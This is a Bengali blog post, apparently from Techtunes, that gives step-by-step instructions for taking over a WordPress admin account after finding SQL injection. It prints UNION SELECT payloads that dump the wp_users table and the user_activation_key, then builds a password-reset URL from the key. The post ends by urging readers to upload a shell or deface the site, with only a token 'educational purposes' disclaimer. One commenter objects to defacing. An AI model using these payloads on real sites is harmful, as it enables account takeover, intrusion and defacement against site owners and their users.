ওয়ার্ডপ্রেস অত্যান্ত জনপ্রিয় একটা ওয়েব সফটওয়্যার। বলা বাহুল্য, ওয়েবডিজাইনারদের সাথে সাথে হ্যাকারদেরও একটা প্রিয় সফটওয়্যার
কারন এই সফটওয়্যারএ ব্যাবহার করা হয় নানা প্ল্যাগিন আর থিমস যেখানে অনেক ধরনের সিকিউরিটি দুর্বলতা থাকে।
এখন আমি বোঝানোর চেস্টা করবো, কীভাবে WP সাইটে SQLi করার পরে এডমিন এক্সেস নিবেন এবং শেল আপলোড দিয়ে সাইট ডিফেস করবেন।
আর হ্যা, আপনি যদি ম্যানুয়াল SQLi না পারেন তাহলে এই পোস্ট আপনার জন্যে না। আগে শিখে পরে এই পোস্ট পড়বেন।
কারন আমি এখানে কি ভাবে SQL Inject করা যায় সেটা আলোচনা করবোনা। পরবর্তীতে একটা পোস্ট দেবার ইচ্ছা আছে এইটা নিয়ে। অথবা টিটতে সার্চ করলেও বাংলা টুট পাবার কথা।
মনে করুন আমি একটা WP সাইটে এস্কিউএল মারলাম। এডমিন আইডি পেলাম পাসওয়ার্ডও পেলাম। কিন্তু সমস্যাটাই হয়ে যায় এই পাসওয়ার্ডে। এটা আমরা পেয়ে থাকি MD5 এনক্রিপ্টেড অবস্থায় যা ভাঙা অনেক ঝামেলা আর সময়ের ব্যাপার। আর আপন যদি নতুন হ্যাকার হয়ে থাকেন তাহলে তো কথাই নেই। মনে হবে এভারেস্ট জয়ের মত একটা ব্যাপার।
আর এই ঝামেলা থেকে মুক্তি দিতেই আজ আমার এই পোস্টের অবতারণা।
আসুন এবার কাজে নেমে যাই।
https://www.site.com/index.php?id=-92 UNION SELECT 1,2,3,4,group_concat(ID,0×40,user_login,0×40,user_pass,0×40,user_nicename,0×40,user_email,0×40,user_url,0×40,user_registered,0×40,user_activation_key,0×40,user_status,0×40,display_name),6,7,8,9,10,11,12,13,14,15,16,17,18+from+wp_users
মনে করি এটাই আমার ভিক্টিমের সাইট। এবং এস্কিউএল এর মাধ্যমে আমরা wp_users টেবিলের সব ডাটা পেয়ে গেলাম।
Ex. 1@admin@$P$BB3TMj.lT1ShUFL5gd31Yf7DX4kKEl.@admin@admin@site.com@2012-09-18 05:16:18@@0@admin
এখানে, পাসওয়ার্ড হিসাবে যে বস্তু আমাদের সামনে আসলো সেটা মোটামুটি এইরকম
$P$BB3TMj.lT1ShUFL5gd31Yf7DX4kKEl.
ভয়ের কোন ব্যাপার নাই, আমি এই হিব্রু ভাষা নিয়ে ঘাটাবো না
যাই হোক এখান থেকে প্রথমে আমাদের যেটা দরকার তা হল,
Username: admin
Email: [email protected]
পেয়ে গেলাম আমাদের দরকারি জিনিস।
এবার ব্রাউজারে আর একটা ট্যাব ওপেন করুন।
সেখানে যেয়ে সাইটের লগিন পেজ এ যান এভাবে।
https://www.site.com/wp-login.php
এডমিন লগিন পেজ আসবে। এবার সেখান থেকে Lost your password? এ ক্লিক করে এডমিনের ই মেইল আইডি দিন। (আগেই যেটা বের করা হয়েছে)
যেমন, আমি দিলাম, [email protected]
এবার গেট নিউ পাসওয়ার্ড এ ক্লিক করুন। আসল কাজ এখান থেকেই শুরু।
আগের ট্যাবে ফেরত যান, user_activation_key বাদে অন্য সব ফিল্ড মুছে ফেলুন।
যেমন, https://www.site.com/index.php?id=-92 UNION SELECT 1,2,3,4,group_concat(user_activation_key),6,7,8,9,10,11,12,13,14,15,16,17,18+from+wp_users
পেজ রিলোড করুন।
দেখুন একটা user_activation_key পাবেন। ধরুন আমারটা,
xxxxxxxx
এবার সাইটে যান, এবং নিচের ইউয়ারেলটি একটু এডিট করে বসিয়ে নিন। কি এডিট করতে হবে সেটা বলছি।
wp-login.php?action=rp&key=resetkey&login=username
এখানে key=resetkey এর resetkey হল আপনি যে user_activation_key পেয়েছেন, সেটাই।
মানে হল, key=xxxxxxxx
আর login=username এর username এর স্থানে আপনি যে আইডি হ্যাক করতে চাচ্ছেন সেই ইউজারনেম দিবেন।
যেমন, login=admin
তাহলে পুরা ব্যাপারটা যা দারালো, সেটা হলঃ
wp-login.php?action=rp&key=xxxxxxxx&login=admin
এইটুকু এবার আমার ভিক্টিম এর সাইটের লেজে বসিয়ে দিলেই কাজ ৯৫% শেষ!
যেমন, https://www.site.com/wp-login.php?action=rp&key=xxxxxxxx&login=admin
এবার পাসওয়ার্ড রিসেটের একটা পেজ আসবে, সেখানে নিউ পাসওয়ার্ড দিয়ে সাইটে প্রবেশ করুন।এবার শেল ঢোকান বা সাইট ডিফেস করে ফেলুন
**** শুধুমাত্র শিক্ষার উদ্যেশ্যে প্রকাশিত।
এই পোস্টটি সর্বপ্রথম এখানে প্রকাশিত হয়েছে।
আমি Snip3r। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 13 বছর 3 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 9 টি টিউন ও 59 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
I am nobody... so, nothing to say... :D
অন্যের সাইট নষ্ট করে কি পাস তোরা ? মনে রাখিস এর জন্য একদিন জবাব দিহি করতে হবে ।